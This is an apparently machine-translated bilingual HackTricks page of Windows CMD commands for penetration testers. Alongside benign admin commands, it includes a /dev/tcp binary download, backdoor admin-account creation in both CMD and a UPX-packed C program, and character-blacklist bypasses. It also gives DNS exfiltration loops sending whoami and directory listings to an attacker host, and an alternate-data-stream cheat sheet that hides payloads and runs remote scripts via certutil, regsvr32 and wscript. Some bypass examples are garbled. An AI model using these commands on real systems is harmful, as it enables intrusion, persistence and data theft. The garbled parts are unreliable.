如果你想运行特定的 Linux 发行版,可以使用以下命令:
```plaintext
wsl -d <distribution>
```
其中 `<distribution>` 是你想要运行的 Linux 发行版的名称。
## 示例
以下是一些使用 `wsl.exe` 的示例:
- 运行默认的 Linux 发行版:
```plaintext
wsl
```
- 运行 Ubuntu 发行版:
```plaintext
wsl -d Ubuntu
```
- 运行 Kali Linux 发行版:
```plaintext
wsl -d Kali
```
请注意,`wsl.exe` 只能在支持 WSL 的 Windows 版本上运行。
```
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
```
## 其他
### Basic CMD commands for pentesters
### 渗透测试人员的基本CMD命令
Here you have a list of basic CMD commands that can be useful during a penetration test.
这里有一些在渗透测试过程中可能有用的基本CMD命令列表。
### Networking
### 网络
#### ipconfig
#### ipconfig
Displays the IP configuration for all network interfaces on the machine.
显示机器上所有网络接口的IP配置。
```plaintext
ipconfig
```
#### netstat
#### netstat
Displays active network connections and listening ports.
显示活动的网络连接和监听端口。
```plaintext
netstat -ano
```
#### nslookup
#### nslookup
Performs DNS lookup on a specified domain or IP address.
对指定的域名或IP地址执行DNS查找。
```plaintext
nslookup google.com
```
#### ping
#### ping
Sends ICMP Echo Request packets to a specified IP address or domain.
向指定的IP地址或域名发送ICMP Echo请求数据包。
```plaintext
ping google.com
```
#### tracert
#### tracert
Traces the route that packets take to reach a specified IP address or domain.
跟踪数据包到达指定的IP地址或域名的路径。
```plaintext
tracert google.com
```
### System Information
### 系统信息
#### systeminfo
#### systeminfo
Displays detailed configuration information about the machine's hardware and software.
显示有关机器硬件和软件的详细配置信息。
```plaintext
systeminfo
```
#### tasklist
#### tasklist
Displays a list of currently running processes on the machine.
显示机器上当前正在运行的进程列表。
```plaintext
tasklist
```
#### net user
#### net user
Displays a list of user accounts on the machine.
显示机器上的用户账户列表。
```plaintext
net user
```
#### net localgroup
#### net localgroup
Displays a list of local groups on the machine.
显示机器上的本地组列表。
```plaintext
net localgroup
```
### File and Directory Operations
### 文件和目录操作
#### dir
#### dir
Lists the files and directories in the current directory.
列出当前目录中的文件和目录。
```plaintext
dir
```
#### cd
#### cd
Changes the current directory.
更改当前目录。
```plaintext
cd C:\Windows
```
#### copy
#### copy
Copies one or more files from one location to another.
从一个位置复制一个或多个文件到另一个位置。
```plaintext
copy file.txt C:\Temp
```
#### move
#### move
Moves one or more files from one location to another.
从一个位置移动一个或多个文件到另一个位置。
```plaintext
move file.txt C:\Temp
```
#### del
#### del
Deletes one or more files.
删除一个或多个文件。
```plaintext
del file.txt
```
### User and Group Management
### 用户和组管理
#### net user
#### net user
Creates, modifies, or deletes user accounts.
创建、修改或删除用户账户。
```plaintext
net user hacker password123 /add
```
#### net localgroup
#### net localgroup
Creates, modifies, or deletes local groups.
创建、修改或删除本地组。
```plaintext
net localgroup administrators hacker /add
```
#### net group
#### net group
Displays or modifies global groups.
显示或修改全局组。
```plaintext
net group administrators
```
### Service Management
### 服务管理
#### sc
#### sc
Manages services on the machine.
管理机器上的服务。
```plaintext
sc query
```
```plaintext
sc start servicename
```
```plaintext
sc stop servicename
```
### Registry Operations
### 注册表操作
#### reg query
#### reg query
Displays the values and subkeys of a specified registry key.
显示指定注册表键的值和子键。
```plaintext
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
```
#### reg add
#### reg add
Adds a new registry key or modifies an existing registry key.
添加新的注册表键或修改现有的注册表键。
```plaintext
reg add HKEY_LOCAL_MACHINE\Software\NewKey
```
#### reg delete
#### reg delete
Deletes a registry key and its subkeys.
删除注册表键及其子键。
```plaintext
reg delete HKEY_LOCAL_MACHINE\Software\NewKey
```
### Task Scheduler
### 任务计划程序
#### schtasks
#### schtasks
Manages scheduled tasks on the machine.
管理机器上的计划任务。
```plaintext
schtasks /query
```
```plaintext
schtasks /create /tn "TaskName" /tr "C:\Temp\script.bat" /sc DAILY /st 12:00
```
```plaintext
schtasks /delete /tn "TaskName"
```
### Event Viewer
### 事件查看器
#### eventvwr
#### eventvwr
Opens the Event Viewer, which displays detailed information about system events.
打开事件查看器,显示有关系统事件的详细信息。
```plaintext
eventvwr
```
### Conclusion
### 结论
These are just a few of the many CMD commands available for Windows. Understanding and utilizing these commands can greatly enhance your effectiveness as a pentester.
这些只是Windows上众多CMD命令中的一部分。理解和利用这些命令可以极大地提高您作为渗透测试人员的效率。
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### 绕过字符黑名单
In some cases, when attempting to execute commands on a target system, certain characters may be blacklisted or filtered out. This can make it difficult to execute commands that contain these restricted characters. However, there are several techniques that can be used to bypass character blacklisting and successfully execute commands.
在某些情况下,在尝试在目标系统上执行命令时,某些字符可能会被列入黑名单或过滤掉。这可能会使包含这些受限字符的命令难以执行。然而,有几种技术可以用来绕过字符黑名单并成功执行命令。
#### 1. Character Substitution
One method to bypass character blacklisting is to substitute restricted characters with similar-looking characters that are not blacklisted. For example, if the character `;` is blacklisted, it can be replaced with a similar-looking character like `;` (Greek question mark). This can trick the system into accepting the command without triggering the blacklist.
#### 1. 字符替换
绕过字符黑名单的一种方法是用看起来相似但不在黑名单中的字符替换受限字符。例如,如果字符 `;` 被列入黑名单,可以用类似的字符 `;`(希腊问号)替换它。这可以欺骗系统接受命令而不触发黑名单。
#### 2. Unicode Encoding
Another technique is to use Unicode encoding to represent restricted characters. This involves converting the restricted character into its Unicode representation and using that in the command. For example, the character `;` can be represented as `%u003B` in Unicode. This can bypass the blacklist as the system may not recognize the Unicode representation as the restricted character.
#### 2. Unicode 编码
另一种技术是使用 Unicode 编码来表示受限字符。这涉及将受限字符转换为其 Unicode 表示,并在命令中使用该表示。例如,字符 `;` 可以用 Unicode 表示为 `%u003B`。这可以绕过黑名单,因为系统可能无法将 Unicode 表示识别为受限字符。
#### 3. Command Concatenation
If certain characters are blacklisted individually but allowed when combined with other characters, command concatenation can be used. This involves breaking the command into multiple parts and concatenating them using allowed characters. For example, if the characters `&` and `;` are blacklisted individually, but allowed when combined as `&;`, the command can be split into two parts and concatenated using `&;` to bypass the blacklist.
#### 3. 命令连接
如果某些字符在单独使用时被列入黑名单,但与其他字符组合时允许使用,可以使用命令连接。这涉及将命令分成多个部分,并使用允许的字符进行连接。例如,如果字符 `&``;` 在单独使用时被列入黑名单,但在组合为 `&;` 时允许使用,可以将命令分成两部分,并使用 `&;` 进行连接以绕过黑名单。
By employing these techniques, it is possible to bypass character blacklisting and successfully execute commands on a target system. However, it is important to note that these techniques may not work in all scenarios, as the effectiveness of character blacklisting varies depending on the specific implementation and configuration of the target system.
通过使用这些技术,可以绕过字符黑名单并成功在目标系统上执行命令。然而,需要注意的是,这些技术可能在所有情况下都不起作用,因为字符黑名单的有效性取决于目标系统的具体实现和配置。
```bash
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
生成一个混淆的CMD命令行
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### 监听地址访问控制列表
您可以在没有管理员权限的情况下监听 [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/)。
```bash
netsh http show urlacl
```
### 手动DNS shell
**攻击者**Kali必须使用以下两个选项之一
```bash
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
```
#### 受害者
_**for /f tokens**_ \_\*\*\_技术这使我们能够执行命令获取每行的前X个单词并将其通过DNS发送到我们的服务器
```
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
```
您还可以**重定向**输出,然后**读取**它。
```
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```
## 从C代码中调用CMD
To call CMD from C code, you can use the `system()` function provided by the C standard library. This function allows you to execute a command in the command prompt.
Here is an example of how to call CMD from C code:
```c
#include <stdlib.h>
int main() {
// Command to be executed
char command[] = "dir";
// Calling CMD using system() function
system(command);
return 0;
}
```
In the above example, the `system()` function is used to execute the `dir` command, which lists the files and directories in the current directory. You can replace `dir` with any other CMD command you want to execute.
To compile and run the above code, you can use a C compiler such as GCC. Save the code in a file with a `.c` extension (e.g., `call_cmd.c`), and then compile it using the following command:
```bash
gcc call_cmd.c -o call_cmd
```
After compiling, you can run the program by executing the generated executable file:
```bash
./call_cmd
```
This will call CMD and execute the specified command. The output of the command will be displayed in the command prompt.
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
```
## 备用数据流速查表ADS/备用数据流)
来自[https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
```bash
##Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}
## Discover ADS contecnt
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
##Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe
##Executing the ADS content###
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe 4172 31C5CE94259D4006 2 18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)
* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Powershell.exe
powershell -ep bypass - < c:\temp:ttt
* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
* Regedit.exe
regedit c:\ads\file.txt:regfile.reg
* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile
* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904
* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS 的最新版本或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
</details>